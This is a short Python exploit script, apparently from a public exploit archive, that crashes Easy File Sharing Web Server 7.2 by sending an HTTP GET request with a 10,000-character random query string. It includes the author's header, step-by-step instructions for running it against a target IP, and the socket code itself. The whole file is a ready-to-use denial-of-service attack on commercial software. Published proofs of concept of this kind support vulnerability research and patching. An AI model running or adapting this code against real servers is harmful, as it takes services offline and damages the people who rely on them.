#!/usr/bin/python # Title : EFS - Easy File Sharing Web Server Denial of Service # Author: Ehsan Noreddini # Date: 03 December 2015 # Version: 7.2 # Tested on: Windows 8 64bit / Windows 7 32bit # Vendor : http://www.sharing-file.com # Download : http://www.sharing-file.com/download.htm # Platform : Windows # Description : Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser # (IE, Firefox, Chrome etc.). # It can help you share files with your users, customers and partners. # They can search for and download files from your computer or upload files from theirs. # The files on your PC can be accessible from anywhere without special software. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). # It makes it easy for remote users to post messages and files to the forum. # The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption. # Usage: # python exploit.py # ______ ______ _____ _______ __ # | ____| ____/ ____| | ____| | | (_) | # | |__ | |__ | (___ | |__ __ ___ __ | | ___ _| |_ # | __| | __| ___ | __| / / &#039;_ | |/ _ | | __| # | |____| | ____) | | |____ > <| |_) | | (_) | | |_ # |______|_| |_____/ |______/_/_ .__/|_|___/|_|__| # POC: # - Download and install EFS Web Server. # - Open the installed software and click on "Try It" # - Click On Start Button # - Now Download the Exploit. # - Then Execute python exploit.py. # - Now Input the EFS IP and Enter. # - Wow ! EFS Web Server Crashed. import socket, random, string, sys def pattern_gen(length): return &#039;&#039;.join(random.choice(string.lowercase) for i in range(length)) url = raw_input("Enter Target URL: ") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((url, 80)) req = "GET /?" + pattern_gen(10000) req += " HTTP/1.1rnrn" sock.send(req) sock.close() print "Crashed!"